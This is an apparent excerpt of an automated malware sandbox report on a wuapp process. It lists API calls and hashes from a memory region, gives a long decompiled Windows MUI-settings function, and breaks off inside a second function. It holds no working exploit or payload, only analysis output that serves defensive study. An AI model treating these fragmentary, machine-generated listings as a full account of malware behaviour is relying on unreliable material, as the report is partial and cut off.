                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: c360dfa50225b9bcdd48af04216d2a876772242fff17f93ccfc2363367a525cc
                                                        • Instruction ID: e34dc3cf9586969f744e63e98fbf2605bdf5c4150ee395c5ecfa7843d7ab4a07
                                                        • Opcode Fuzzy Hash: c360dfa50225b9bcdd48af04216d2a876772242fff17f93ccfc2363367a525cc
                                                        • Instruction Fuzzy Hash: 55F022B62043042FCB20EFA9EC80EDB7798AF85364F008449F84C5B603C630E915CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A650 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0012A6A4
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                        • Instruction ID: 5c254d0d6d73717242566072e71c41882398f2dc172016d647cf05f47ea51bd6
                                                        • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                        • Instruction Fuzzy Hash: E201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F118258BA0D97245C630EC51CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A64D Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0012A6A4
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 0f1ce346c5fce77d5ce9fae80055a9ec3d393922c69a97fbae8876696ff47ec7
                                                        • Instruction ID: 9b67271ff9bbd4cc108861d857b489d98c59deb28fc42aa1e427b9dd5c62527f
                                                        • Opcode Fuzzy Hash: 0f1ce346c5fce77d5ce9fae80055a9ec3d393922c69a97fbae8876696ff47ec7
                                                        • Instruction Fuzzy Hash: 1101B6B6210108BFCB54CF89DC81EEB77ADAF8C754F118258FA0D97255C634E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00129120 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011D290,?,?), ref: 0012915C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: 0fb4d47717480a5baf77f538d5614a21f461a549888388fa5683e808b0705816
                                                        • Instruction ID: d342525c5dce3f71d072afe121a28d9369a35dedd4526deb2f4f3b6aa679bbe2
                                                        • Opcode Fuzzy Hash: 0fb4d47717480a5baf77f538d5614a21f461a549888388fa5683e808b0705816
                                                        • Instruction Fuzzy Hash: 18E06D3338031436E32065A9AC03FA7B69CDB90B20F14002AFA0DEB2C1E6A1F81142A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A6AB Relevance: 1.5, APIs: 1, Instructions: 35processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0012A6A4
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 80d6f94866a088d8ddd6de59a7225987c9e8ef4e9489aebd4d8ef52862bfbc53
                                                        • Instruction ID: 1ff20e7b23da0e3201b930621ac41e6e495a00bde4590533d4b66943d895e02f
                                                        • Opcode Fuzzy Hash: 80d6f94866a088d8ddd6de59a7225987c9e8ef4e9489aebd4d8ef52862bfbc53
                                                        • Instruction Fuzzy Hash: 7EF062B6210019AF8B44DF9DEC80DEB73ADAF8C714B559208FA1DD3255D634EC518BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A5A0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00125126,?,0012589F,0012589F,?,00125126,?,?,?,?,?,00000000,00000005,00000206), ref: 0012A5CD
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                        • Instruction ID: 8e8685c87d34bd88589782826ba7efad9a2e72207c1041887653f436947d1f5b
                                                        • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                        • Instruction Fuzzy Hash: 60E04FB12002146BDB14DF49DC45E9B37ACEF88754F018154FE085B241C630F910CBF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0012A60D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                        • Instruction ID: fd87d305bc0daff27ead6cb41e74f1345f81174dbadaa449077f71de208cafeb
                                                        • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                        • Instruction Fuzzy Hash: DCE04FB12002146FD714DF49DC49EA737ACEF88750F114154FD0857241C630F910CAF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A740 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011D562,0011D562,?,00000000,?,?), ref: 0012A770
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                        • Instruction ID: ef2c1c70304ca26d6def4ddd0886e387c0c6805ec189b833294cc4729231fc7c
                                                        • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                        • Instruction Fuzzy Hash: 40E01AB22002186BDB10DF49DC45EE737ADAF89654F018154BA0857241C630E8148AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0011D9CE Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,001181E3,?), ref: 0011D9FB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 86cc229081c305ac01309eada17de36257433ccebb23e2f073137eebbef059e9
                                                        • Instruction ID: 43874208f569bae6e8495ba0e69cb74bbf68539377b37e3e597d287216ebec6b
                                                        • Opcode Fuzzy Hash: 86cc229081c305ac01309eada17de36257433ccebb23e2f073137eebbef059e9
                                                        • Instruction Fuzzy Hash: 88D097E15A83092AF760F7F0ACC3F263E048B00300F0A02E8E418AF0C3CE54D0509236
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0011D9D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,001181E3,?), ref: 0011D9FB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 9150d0d40ae8b8939ca8b65567a20e3e661ab3ee174f96d1588e7d8f6837221b
                                                        • Instruction ID: c27dc1dc4cb476c27ea6ec7bf8f8525814befb57dcd3919d9594123bda2f071f
                                                        • Opcode Fuzzy Hash: 9150d0d40ae8b8939ca8b65567a20e3e661ab3ee174f96d1588e7d8f6837221b
                                                        • Instruction Fuzzy Hash: 32D0A77264030837F710E6E49C43F6636CC9B48B04F0540B4F909DB3C3DA60F4004165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0011A0D3 Relevance: 1.5, APIs: 1, Instructions: 13libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0011A152
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction ID: 2ec5fcba1596988ef6f001221be91c15e582cef8671a60fcc2881df41cf59e77
                                                        • Opcode Fuzzy Hash: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction Fuzzy Hash: 4AC0C030E25104AFEF10C5944C02FF833D0C7103B3F7001E66C0CC7241D5120C000290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 01EC8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E01EC8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01EC8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01EAE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01EC718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01EC8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01EC718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01EC8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01EC8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01EC8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01EC718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01EAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01EA2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01EBE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01EAE2A8(_t322,  &_v68, _v16);
								if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01EBE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01EAE2A8(_t322,  &_v68, _t236);
								if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01EC718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01EAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01EA2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01EBE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01EAE2A8(_v12,  &_v68, _v16);
							if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01EBE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01EAE2A8(_t322,  &_v68, _t269);
							if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01EC718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01EAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01EA2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01EBE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01EAE2A8(_v12,  &_v68, _v16);
						if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01EBE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01EAE2A8(_t322,  &_v68, _t296);
						if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                        0x01ec8788
                                                        0x01ec8788
                                                        0x01ec8791
                                                        0x01ec8794
                                                        0x01ec8798
                                                        0x01ec879b
                                                        0x01ec879e
                                                        0x01ec87a1
                                                        0x01ec87a4
                                                        0x01ec87a7
                                                        0x01ec87aa
                                                        0x01ec87af
                                                        0x01f11ad3
                                                        0x01ec8b0a
                                                        0x01ec8b0d
                                                        0x01ec8b13
                                                        0x01ec8b19
                                                        0x01ec8b1f
                                                        0x01ec8b25
                                                        0x01ec8b2b
                                                        0x01ec8b31
                                                        0x01ec8b37
                                                        0x01ec8b3d
                                                        0x01ec8b46
                                                        0x01ec8b46
                                                        0x01ec87c6
                                                        0x01ec87d0
                                                        0x01f11ae0
                                                        0x01f11ae6
                                                        0x01f11af8
                                                        0x01f11af8
                                                        0x01f11afd
                                                        0x01f11afe
                                                        0x01f11b01
                                                        0x01f11b06
                                                        0x01f11b06
                                                        0x01ec87d6
                                                        0x01ec87f2
                                                        0x01ec87f7
                                                        0x01ec8807
                                                        0x01ec880a
                                                        0x01ec880f
                                                        0x01ec8810
                                                        0x01ec8813
                                                        0x01ec8818
                                                        0x01ec8818
                                                        0x01ec882c
                                                        0x01ec8831
                                                        0x01ec8838
                                                        0x01ec8908
                                                        0x01ec8920
                                                        0x01ec89f0
                                                        0x01ec8a08
                                                        0x01ec8af6
                                                        0x01ec8af6
                                                        0x01ec8af8
                                                        0x01ec8afb
                                                        0x01f11beb
                                                        0x01f11beb
                                                        0x01ec8b04
                                                        0x01f11bf8
                                                        0x01f11c0e
                                                        0x01f11c13
                                                        0x01f11c16
                                                        0x01f11c16
                                                        0x01f11bf8
                                                        0x00000000
                                                        0x01ec8b04
                                                        0x01ec8a0e
                                                        0x01ec8a11
                                                        0x01ec8a14
                                                        0x01ec8a15
                                                        0x01ec8a18
                                                        0x01ec8a22
                                                        0x01ec8b59
                                                        0x01ec8a28
                                                        0x01ec8a3c
                                                        0x01ec8a3c
                                                        0x01ec8a42
                                                        0x01f11bb0
                                                        0x01f11b11
                                                        0x01f11b11
                                                        0x00000000
                                                        0x01ec8a48
                                                        0x01ec8a51
                                                        0x01ec8a5b
                                                        0x01ec8a5e
                                                        0x01ec8a61
                                                        0x01ec8a69
                                                        0x01ec8a69
                                                        0x01ec8a6d
                                                        0x00000000
                                                        0x00000000
                                                        0x01ec8a74
                                                        0x01ec8a7c
                                                        0x01ec8a7d
                                                        0x01ec8a91
                                                        0x01ec8a93
                                                        0x01ec8a93
                                                        0x01ec8a98
                                                        0x01ec8a9b
                                                        0x01ec8aa1
                                                        0x01ec8aa1
                                                        0x01ec8aa4
                                                        0x01ec8aaa
                                                        0x01ec8ab1
                                                        0x01ec8ac5
                                                        0x01ec8ac7
                                                        0x01ec8ac7
                                                        0x01ec8ac5
                                                        0x01ec8ace
                                                        0x01f11bc9
                                                        0x01f11bce
                                                        0x01f11bd2
                                                        0x01f11bd2
                                                        0x01ec8ad8
                                                        0x01ec8aeb
                                                        0x01ec8aeb
                                                        0x01ec8af0
                                                        0x01ec8af4
                                                        0x00000000
                                                        0x01ec8af4
                                                        0x01ec8a42
                                                        0x01ec8926
                                                        0x01ec8929
                                                        0x01ec892c
                                                        0x01ec892d
                                                        0x01ec8930
                                                        0x01ec8935
                                                        0x01ec893a
                                                        0x01ec8b51
                                                        0x01ec8940
                                                        0x01ec8954
                                                        0x01ec8954
                                                        0x01ec895a
                                                        0x01f11b63
                                                        0x00000000
                                                        0x01ec8960
                                                        0x01ec8969
                                                        0x01ec8973
                                                        0x01ec8976
                                                        0x01ec8979
                                                        0x01ec897e
                                                        0x01ec8981
                                                        0x01ec8981
                                                        0x01ec8986
                                                        0x00000000
                                                        0x00000000
                                                        0x01f11b6e
                                                        0x01f11b74
                                                        0x01f11b7b
                                                        0x01f11b8f
                                                        0x01f11b91
                                                        0x01f11b91
                                                        0x01f11b99
                                                        0x01f11b9c
                                                        0x01f11ba2
                                                        0x01f11ba2
                                                        0x01ec898c
                                                        0x01ec8992
                                                        0x01ec8999
                                                        0x01ec89ad
                                                        0x01f11ba8
                                                        0x01f11ba8
                                                        0x01ec89ad
                                                        0x01ec89b6
                                                        0x01ec89c8
                                                        0x01ec89cd
                                                        0x01ec89d0
                                                        0x01ec89d0
                                                        0x01ec89d6
                                                        0x01ec89e8
                                                        0x01ec89e8
                                                        0x01ec89ed
                                                        0x00000000
                                                        0x01ec89ed
                                                        0x01ec895a
                                                        0x01ec883e
                                                        0x01ec8841
                                                        0x01ec8844
                                                        0x01ec8845
                                                        0x01ec8848
                                                        0x01ec884d
                                                        0x01ec8852
                                                        0x01ec8b49
                                                        0x01ec8858
                                                        0x01ec886c
                                                        0x01ec886c
                                                        0x01ec8872
                                                        0x01f11b0e
                                                        0x00000000
                                                        0x01ec8878
                                                        0x01ec8881
                                                        0x01ec888b
                                                        0x01ec888e
                                                        0x01ec8891
                                                        0x01ec8896
                                                        0x01ec8899
                                                        0x01ec8899
                                                        0x01ec889e
                                                        0x00000000
                                                        0x00000000
                                                        0x01f11b21
                                                        0x01f11b27
                                                        0x01f11b2e
                                                        0x01f11b42
                                                        0x01f11b44
                                                        0x01f11b44
                                                        0x01f11b4c
                                                        0x01f11b4f
                                                        0x01f11b55
                                                        0x01f11b55
                                                        0x01ec88a4
                                                        0x01ec88aa
                                                        0x01ec88b1
                                                        0x01ec88c5
                                                        0x01f11b5b
                                                        0x01f11b5b
                                                        0x01ec88c5
                                                        0x01ec88ce
                                                        0x01ec88e0
                                                        0x01ec88e5
                                                        0x01ec88e8
                                                        0x01ec88e8
                                                        0x01ec88ee
                                                        0x01ec8900
                                                        0x01ec8900
                                                        0x01ec8905
                                                        0x00000000
                                                        0x01ec8905

                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01EC8914
                                                        • Kernel-MUI-Language-Allowed, xrefs: 01EC8827
                                                        • Kernel-MUI-Number-Allowed, xrefs: 01EC87E6
                                                        • WindowsExcludedProcs, xrefs: 01EC87C1
                                                        • Kernel-MUI-Language-SKU, xrefs: 01EC89FC
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 50b6c51601a333298cad2194f0cb35a739cfefdc1ea9901d5e50c7dd9c628181
                                                        • Instruction ID: 0ad922e52241e5f0ef77e61fb266b590c932d3e416c231731779853aa789e8bc
                                                        • Opcode Fuzzy Hash: 50b6c51601a333298cad2194f0cb35a739cfefdc1ea9901d5e50c7dd9c628181
                                                        • Instruction Fuzzy Hash: 70F109B2D0024AEFDF11DF98CA80DEEBBB8FF18704F54546AE605A7210D735AA45DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EE13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 38%
                                                        			E01EE13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
